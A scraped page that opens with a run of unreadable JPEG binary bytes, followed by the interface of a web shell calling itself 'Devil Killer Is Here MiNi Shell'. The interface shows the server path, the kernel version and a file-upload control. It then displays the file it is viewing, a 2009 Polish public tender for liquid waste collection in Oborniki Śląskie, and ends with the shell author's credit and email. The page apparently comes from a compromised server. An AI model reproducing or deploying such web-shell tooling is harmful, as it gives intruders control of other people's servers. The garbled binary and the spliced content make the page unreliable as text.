JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090318/68178-N-2009.html

<p class="kh_header"><b>Oborniki Śląskie: Odbiór nieczystości płynnych z zasobów mieszkaniowych zarządzanych przez Zakład Gospodarki Mieszkaniowej  w Obornikach Śląskich</b><br>
<b>Numer ogłoszenia: 68178 - 2009; data zamieszczenia: 18.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Mieszkaniowej w Obornikach Śląskich , ul. Wąska 10, 55-120 Oborniki Śląskie, woj. dolnośląskie, tel. 071 3103245, faks 071 3103245.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> k.ilona@wp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór nieczystości płynnych z zasobów mieszkaniowych zarządzanych przez Zakład Gospodarki Mieszkaniowej  w Obornikach Śląskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Odbiór nieczystości płynnych z zasobów mieszkaniowych zarządzanych przez Zakład Gospodarki Mieszkaniowej  w Obornikach Śląskich , 
zakładana ilość około 300,00 m3/mies..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wadium wysokości 4800,00 zł należy wpłacić na konto ZGM w Obornikach Śląskich nr: 
10958300090000025720000001 w Banku Spółdzielczym w Obornikach Śląskich ul. Trzebnicka 1 w terminie do 03.04.2009r<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI STAWIANE OFERENTOM 

1.	Spełnianie warunków ubiegania się o udzielenie zamówienia publicznego z art. 22 ust. 1 Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz. U. z 09.02.2004r. Nr 19 poz. 177):

a) posiadanie ustawowo wymaganych uprawnień:

Sprawdzenie spełniania warunku odbywa się na podstawie dokumentów załączonych do oferty, dlatego też do oferty należy dołączyć 
- aktualne zezwolenie na odbiór odpadów komunalnych z terenu gminy Oborniki Śląskie wydane przez Burmistrza Obornik Śląskich, zgodnie z Ustawą o utrzymaniu czystości i porządku w gminach (Dz. U. 1996.132.622). 
-aktualną umowę na odbiór nieczystości ciekłych zawartą z ZGK Sp. z o.o. w Obornikach Śląskich
-aktualny atest na wytrzymałość beczek ,którymi świadczone będą usługi , na ciśnienie
oraz

b) posiadanie niezbędnej wiedzy i doświadczenia (przynajmniej 1 zlecenia o wartości nie mniejszej niż niniejsze zamówienie) w realizacji prac objętych przedmiotem zamówienia tj: odbiór nieczystości płynnych w ilości równej przedmiotowi zamówienia tj. nie mniej niż 300,00 m3/m-c:

Sprawdzenie spełniania warunku odbywa się na podstawie dokumentów załączonych do oferty, dlatego też do oferty należy dołączyć - wykaz wykonanych w okresie ostatnich trzech lat usług, odpowiadających przedmiotowi zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców
wraz z 
dokumentami potwierdzającymi, że usługi te zostały wykonane należycie (np. referencje).

Dokumenty potwierdzające, że usługi zostały wykonane z należytą starannością muszą być wystawione przez Zleceniodawcę (Zamawiającego) i popisane przez osobę, co do której istnieć będzie z racji wykonywania określonej funkcji lub zajmowanego stanowiska - domniemanie do reprezentowania Zleceniodawcy (Zamawiającego). Dokumenty te winny również zawierać: nazwę Zleceniodawcy (Zamawiającego), nazwę usługi i termin jej  realizacji. 

c) posiadanie odpowiedniego potencjału technicznego i organizacyjnego:

sprzęt: 

* 2 samochody -beczkowozy 

Sprawdzenie spełniania warunku odbywa się na podstawie dokumentów załączonych do oferty, dlatego też do oferty należy dołączyć - dowody rejestracyjne bądź umowy dzierżawy dot. przedmiotowego sprzętu,

personel techniczny zdolny do wykonania zamówienia:

Sprawdzenie spełniania warunku odbywa się na podstawie dokumentów załączonych do oferty, dlatego też do oferty należy dołączyć - wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności  

wraz z 

dokumentami stwierdzającymi, że osoby które będą wykonywać zamówienie, posiadają wymagane uprawnienia (zaświadczenia o posiadaniu przez kierowców, którzy będą wykonywać zamówienie, wymaganych do wykonania zamówienia kwalifikacji zgodnie z wymaganiami określonymi w art. 39 a ust.1  pkt. 3-5 Ustawy z dnia 6 września 2001 r o transporcie drogowym tj. orzeczenia lekarskie, orzeczenia psychologiczne, dokumenty potwierdzające odbycie kursu w zakresie przewozu osób/rzeczy).

d) znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

Posiadają na dzień złożenia oferty ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę odpowiadającą co najmniej 100 tys. (słownie : sto tysięcy złotych).


2. Nie podleganie wykluczeniu z prowadzonego postępowania przetargowego na podstawie przepisu art. 24 Ustawy z dnia 29.01.2004 r. Prawo zamówień publicznych (Dz.U. z 09.02.2004r. Nr 19 poz. 177).

           UWAGA: Powyższe warunki są potwierdzane dokumentami, określonymi w Rozporządzeniu w sprawie rodzaju dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać zamawiający od wykonawców z dnia 07.04.2004 r. (Dz.U. Nr 71 poz. 645).

      3. Wniesienie wadium.

W przypadku udziału w przedmiotowym postępowaniu podmiotów występujących wspólnie (s.c., konsorcjum) ustala następujące zasady:

- Każdy z podmiotów składających ofertę wspólną musi samodzielnie spełniać warunek ekonomiczno - finansowy określony w pkt. 1. d) oraz warunki określone w powyższym  pkt.2.

-Wszystkie pozostałe warunki winny być spełnione łącznie przez podmioty składające ofertę wspólną. 

UWAGA: Ocena spełniania warunków stawianych poszczególnym wykonawcom (również tych występujących wspólnie) nastąpi na podstawie oświadczeń złożonych w oparciu o przepisy, o których mowa w powyższym pkt. 1. i 2. oraz dokumentów wymienionych w powyższych pkt. 1-3, a także zgodnie z postanowieniami, zawartymi rozdziale V. (Wymagane dokumenty) niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 9.	WYMAGANA ZAWARTOŚĆ OFERTY.

9.1 Oferta powinna składać się z następujących elementów:

v	Formularza oferty wg załącznika nr 8 do SIWZ

9.2	Do oferty należy dołączyć wypełnione i podpisane oświadczenia :

.	oświadczenie Oferenta - załącznik nr 4 do niniejszej specyfikacji,
.	oświadczenie, że Oferent jest lub nie jest płatnikiem podatku od towarów i usług (VAT) - załącznik nr 5 do niniejszej specyfikacji
.	oświadczenie o braku zależności lub dominacji zgodnie z art. 22 ustęp 5 ustawy o zamówieniach publicznych - załącznik nr 6 do niniejszej specyfikacji.

9.3 Do oferty należy załączyć następujące dokumenty:

.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 

Profil działania Wykonawcy musi odpowiadać przedmiotowi zamówienia , a odpis musi zawierać aktualny wykaz osób uprawnionych do reprezentowania Wykonawcy .Wykonawcy którzy złożyli wnioski do Krajowego Rejestru Sądowego winni złożyć potwierdzoną kserokopię wniosku.

W przypadku składania oferty przez podmioty występujące wspólnie-kilku wykonawców, właściwe dokumenty muszą być złożone przez każdy podmiot z osobna. Dla ważności oferty składanej przez podmioty występujące wspólnie wystarczy, iż profil działalności odpowiadający przedmiotowi zamówienia, wykaże przynajmniej jeden z podmiotów.

Uchwałę wspólników Spółki z o.o. przewidującą możliwość zaciągnięcia zobowiązania do świadczenia o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego i umowę spółki lub tylko umowę spółki , jeżeli reguluje ona te kwestie inaczej (samodzielnie).
Uwaga: Zamawiający informuje , iż zgodnie z przepisem art. 230 Kodeksu spółek handlowych w zw. Z art.17 tegoż kodeksu: (W przypadku Spółek z o.o. zaciągnięcie zobowiązania do świadczenia o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego wymaga uchwały wspólników , chyba że umowa spółki stanowi inaczej).
.	umowę regulującą współpracę podmiotów występujących wspólnie ( w przypadku gdy oferta składana będzie wspólnie)
.	aktualną informację z Krajowego Rejestru Skazanych w zakresie określonym w artykule 24 ust. 1 pkt 4 - 8 ustawy o zamówieniach publicznych, wystawioną nie wcześniej niż 6 miesięcy przed terminem składania ofert. 
W przypadku składania oferty przez podmioty występujące wspólnie-kilku wykonawców , właściwe dokumenty muszą być złożone przez każdy podmiot z osobna .

*Pełnomocnictwo w przypadku jego udzielenia dla potrzeb niniejszego postępowania  , określające zakres upoważnienia pełnomocnika (do reprezentowania wykonawcy,wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego) ,opłacone stosowną opłatą skarbową . 

Uwaga: Z treści pełnomocnictwa winno wynikać upoważnienie  danej osoby (osób) do dokonywania w danym postępowaniu konkretnych ww czynności .

Pełnomocnictwo winno zostać wystawione przez wszystkie osoby uprawnione do występowania w obrocie prawnym w imieniu Wykonawcy-(upoważnienie winno wynikać z odpowiedniego dokumentu: odpisu z rejestru handlowego, w przypadku spółki cywilnej z umowy , w przypadku prowadzenia indywidualnej działalności gospodarczej z zaświadczenia o wpisie do ewidencji działalności gospodarczej).

W przypadku oferty składanej przez podmioty występujące wspólnie - kilku wykonawców pełnomocnictwo winno zostać wystawione przez wszystkich wykonawców ( o tym czy dany wykonawca może dać umocowanie , decyduje dotyczący go dokument rejestracyjny, z którego wynika właściwy sposób rejestracji).
Uwaga: Pełnomocnictwo nie jest wymagane jeżeli podpisujący jest lub są osobami upoważnionymi do reprezentowania firmy, właścicielami firmy lub jeżeli jest on (są oni) wymienieni z imienia i nazwiska w odnośnym dokumencie rejestracyjnym.

* Zaświadczenie z właściwego urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzające odpowiednio , że  wykonawca nie zalega z opłacaniem podatków , opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenie ,że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

W przypadku składania oferty przez podmioty występujące wspólnie-kilku wykonawców , właściwe zaświadczenia muszą być złożone przez każdy podmiot z osobna.

.	Informację o liczbie zatrudnionych na stałe pracowników 
Zamawiający dla potwierdzenia spełnienia warunków określonych w art.22 ust.1 pkt.2 ustawy z dnia 29.01.2004r.Prawo zamówień publicznych , zobowiązuje Wykonawców do obowiązkowego dołączenia :
-wykazu osób i podmiotów , które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności wraz z dokumentami stwierdzającymi , że osoby które będą wykonywać zamówienie , posiadają wymagane uprawnienia
-wykazu podwykonawców i części zamówienia , która zostanie im powierzona
-wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń , jakie posiada Wykonawca (wykaz musi uwzględniać sprzęt warunkujący udział Wykonawcy w realizacji przedmiotowego zamówienia , określony w niniejszej SIWZ wraz z niezbędnymi określonymi w SIWZ dokumentami potwierdzającymi posiadanie tegoż sprzętu)
W przypadku składania oferty przez podmioty występujące wspólnie -kilku wykonawców ,właściwe wykazy mogą być złożone przez każdy podmiot z osobna lub przez wszystkich wykonawców wspólnie ze wskazaniem , które zamówienie dotyczy którego wykonawcy. Jednakże dla spełnienia warunku badanego na podstawie niniejszych wykazów wystarczy , iż będzie on spełniony przez wszystkich wykonawców.

*polisę lub inny dokument ubezpieczenia, potwierdzającą , że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę odpowiadającą co najmniej 100,000zł (sto tysięcy złotych)
UWAGA: polisa przedstawiona do oferty musi być aktualna na dzień składania ofert
W przypadku składania oferty przez podmioty występujące wspólnie -kilku wykonawców, właściwe dokumenty muszą być złożone przez każdy podmiot z osobna , jednakże dla spełnienia warunku badanego na podstawie niniejszych dokumentów wystarczy , iż będzie on wspólnie spełniony przez wszystkich

-umowę spółki cywilnej, jeżeli działalność gospodarcza prowadzona jest w formie spółki cywilnej
-umowę konsorcjum (do oferty musi być dołączona potwierdzona notarialnie umowa konsorcjum, nie dopuszcza się składania umowy przedwstępnej konsorcjum lub umowy zawartej pod warunkiem zawieszającym) , z której wynikać będzie w szczególności:
-jednoznaczne określenie wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot zamówienia
-zobowiązanie do złożenia oferty wspólnej i realizacji całości prac objętych przedmiotem zamówienia publicznego w przypadku wyboru oferty, w terminie i na warunkach wynikających ze złożonej oferty, umowy zawartej z Zamawiającym oraz umowy konsorcjum
-określenie sposobu reprezentacji wszystkich podmiotów wchodzących w skład konsorcjum
-określenie sposobu współdziałania podmiotów z dokładnym podaniem podziału zadań (uprawnienia i obowiązki) w trakcie realizacji zamówienia
-wskazanie podmiotu wiodącego z jednoczesnym upoważnieniem go (zobowiązaniem) w drodze stosownego pełnomocnictwa do wspólnej reprezentacji, bezpośredniego kontaktowania się ( w sprawach rozliczeń, korespondencji) i współdziałania z Zamawiającym w trakcie realizacji przedmiotu zamówienia
UWAGA: W powyższym przypadku do oferty należy dołączyć pełnomocnictwo m.in. Do wspólnej reprezentacji , bezpośredniego kontaktowania się ( w sprawach rozliczeń , korespondencji) i współdziałania z Zamawiającym w trakcie realizacji zamówienia , wystawione na rzecz danej osoby i podpisane  przez wszystkich członków konsorcjum
-dokładne określenie (poprzez zapis umowy) iż członkowie konsorcjum ponoszą solidarną odpowiedzialność wobec Zamawiającego
-zobowiązanie wszystkich członków konsorcjum (poprzez zapis umowy) w przypadku zmiany stanu prawnego uniemożliwiającego wykonanie umowy konsorcjum przez któregokolwiek z członków konsorcjum - do dokonania stosownych zmian w treści umowy konsorcjum umożliwiających jej wykonanie w zmienionych warunkach prawnych

UWAGA : Zamawiający wyjaśnia, iż w sytuacji opisanej powyżej nie ulegnie zmianie umowa o wykonanie zamówienia publicznego w zakresie wynagrodzenia należnego konsorcjum.

-    zapis wykluczający możliwość dokonywania jakichkolwiek zmian w umowie konsorcjum bez uzyskania uprzedniej zgody Zamawiającego, 
-    czas obowiązywania umowy, który nie może być krótszy niż termin realizacji zamówienia, ale uwzględniający czas trwania roszczeń z tytułu (ewentualnej) gwarancji i rękojmi,
-   zapis wykluczający możliwość wypowiedzenia umowy konsorcjum przez któregokolwiek z jego członków do czasu wykonania zamówienia oraz upływu czasu (ewentualnej) gwarancji i rękojmi
-     enumeratywne określenie sytuacji, w których dojść może do tzw. (ustania) konsorcjum tj.
wykonanie i pełne rozliczenie się z prac objętych przedmiotem umowy zawartej z Zamawiającym, w tym upływ terminu co do zgłaszania ewentualnych roszczeń z tytułu gwarancji i rękojmi
-	przewidzenie sytuacji niewykonania zamówienia wskutek zaistnienia sytuacji (siły wyższej), która uniemożliwia w sposób całkowity wykonanie prac objętych przedmiotem umowy, z zaznaczeniem w umowie, iż w takiej sytuacji członkom konsorcjum przysługiwać będzie jedynie wynagrodzenie częściowe za czynności faktycznie dokonane do czasu nastąpienia zjawiska (siły wyższej),

UWAGA : Jako (siłę wyższą) należy rozumieć zdarzenie zewnętrzne, którego nie można było przewidzieć ani jemu zapobiec, przy aktualnym stanie wiedzy, powstałe w szczególności : wskutek zaistnienia stanu klęski żywiołowej, wojny, strajków, oraz aktów prawnych organów władzy i administracji państwowej, a także samorządowej, który uniemożliwia wykonanie przez członków konsorcjum zamówienia publicznego.

-Wykaz wykonanych w okresie ostatnich trzech lat usług, odpowiadających przedmiotowi zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i Zleceniodawców wraz z  dokumentami potwierdzającymi należyte wykonanie tych usług

-	Oświadczenie, jakie dokumenty składające się na ofertę i na podstawie jakich artykułów stanowią (tajemnicę przedsiębiorstwa) - w przypadku gdy Wykonawca pragnie zastrzec informacje stanowiące tajemnicę przedsiębiorstwa

W przypadku składania oferty przez podmioty występujące wspólnie, właściwe koperty oraz oświadczenia muszą być podpisane i złożone przez każdy podmiot z osobna. 

UWAGA : Zamawiający zobowiązuje wykonawców, aby w przypadku pojawienia się w ofercie informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów 4 ustawy z dnia 16.04.1993 r. o zwalczaniu nieuczciwej konkurencji, które Wykonawca będzie chciał zastrzec przed dostępem dla innych uczestników postępowania - zostały załączone do oferty w osobnym opakowaniu (kopercie) z dopiskiem : 
(nformacje stanowiące tajemnicę przedsiębiorstwa - nie udostępniać innym uczestnikom postępowania).

UWAGA : Zamawiający informuje, iż nie można zastrzec w tej części oferty min. informacji dotyczących ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofercie, zgodnie z brzmieniem przepisu art. 96 ust. 4 w zw. z art. 86 ust. 2 Ustawy jw. Tak więc zastrzeżenie tej części oferty jako niedostępnej dla innych uczestników postępowania byłoby niezgodne z ustawą Prawo zamówień publicznych.

UWAGA : 

W przypadku składania pełnomocnictwa , pełnomocnictwo winno zostać przedstawione w oryginale lub kserokopii potwierdzonej za zgodność z oryginałem przez wszystkie osoby uprawnione do występowania w obrocie prawnym w imieniu Wykonawcy - ( upoważnienie winno wynikać z odpowiedniego dokumentu : odpisu z rejestru handlowego, w przypadku spółki cywilnej z umowy, w przypadku prowadzenia indywidualnej działalności gospodarczej z zaświadczenia o wpisie do ewidencji działalności gospodarczej) i zostać właściwie opłacone stosowną opłatą skarbową.

Wszystkie dokumenty - winny być przedstawione w formie oryginału albo kserokopii poświadczonych za zgodność z oryginałem przez Wykonawcę. 

Jeżeli Wykonawca zamierza dołączyć kserokopie, muszą być one potwierdzone za zgodność z oryginałem przez osobę lub osoby uprawnione do występowania w obrocie prawnym w imieniu Wykonawcy - ( upoważnienie winno wynikać z odpowiedniego dokumentu : odpisu z rejestru handlowego, w przypadku prowadzenia indywidualnej działalności gospodarczej z zaświadczenia o wpisie do ewidencji działalności gospodarczej, albo ze stosownego pełnomocnictwa do podpisania całej oferty bądź tylko jej niektórych dokumentów). 

Na kserokopii należy zamieścić zapis: (za zgodność z oryginałem) oraz datę poświadczenia za zgodność z oryginałem. Kserokopia powinna być zaopatrzona na każdej jej stronie (stronie zawierającej treść) własnoręcznym, czytelnym podpisem i pieczątkami osoby bądź osób, mających prawo zaciągania zobowiązań i reprezentacji Wykonawcy ( sposób reprezentacji musi wynikać ze stosownych dokumentów np. z umowy spółki cywilnej, z zaświadczenia o wpisie do ewidencji działalności gospodarczej, z odpisu z właściwego rejestru bądź udzielonego pełnomocnictwa), a także pieczęcią firmową Wykonawcy. 

W przypadku składania oferty przez podmioty występujące wspólnie- kilku wykonawców, kserokopie dokumentów a dotyczące poszczególnych podmiotów muszą być potwierdzone za zgodność z oryginałem przez podmioty, których dotyczą.

Natomiast dokumenty -pełnomocnictwo, umowę konsorcjum, dowód wniesienia wadium podpisują wszyscy wykonawcy składający ofertę wspólną.

Wszystkie oświadczenia , wykaz wykonanych w okresie ostatnich trzech lat usług oraz oświadczenie -jakie dokumenty stanowią tajemnicę przedsiębiorstwa muszą być podpisane i opieczętowane przez osobę lub osoby uprawnione do występowania w obrocie prawnym w imieniu każdego Wykonawcy z osobna (upoważnienie winno wynikać z odpowiedniego dokumentu: odpisu z rejestru handlowego, w przypadku prowadzenia indywidualnej działalności gospodarczej z zaświadczenia o wpisie do ewidencji działalności gospodarczej, a także ze stosownego pełnomocnictwa do podpisania bądź całej oferty bądź tylko jej niektórych dokumentów). 

W przypadku składania oferty przez podmioty występujące wspólnie- kilku wykonawców, wszystkie oświadczenia muszą być podpisane przez każdy podmiot, którego dotyczą z osobna.
-Zaakceptowany wzór umowy ( załącznik nr 7 do SIWZ)
-dowód wniesienia wadium

Kserokopie dokumentów wymienionych w pkt. 9.3 muszą być poświadczone przez oferenta za zgodność z oryginałem 
Oferent zobowiązany jest na żądanie Zamawiającego do przedstawienia oryginalnych dokumentów wymienionych w pkt. 9.3. 

10. W przypadku złożenia oferty przez spółkę cywilną, Oferent obowiązany jest do dołączenia do oferty pełnomocnictwa do występowania w imieniu spółki lub podpisania dokumentów przetargowych przez wszystkich wspólników..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> BIP Oborniki Śląskie.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Mieszkaniowej w Obornikach Śląskich
ul. Wąska 10
55-120 Oborniki Śląskie
pokój nr 7 
Dział Techniczny.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.04.2009 godzina 09:55, miejsce: ZGM w Obornikach Śląskich
ul. Wąska 10
55-120 Oborniki Śląskie
sekretariat , 
I piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com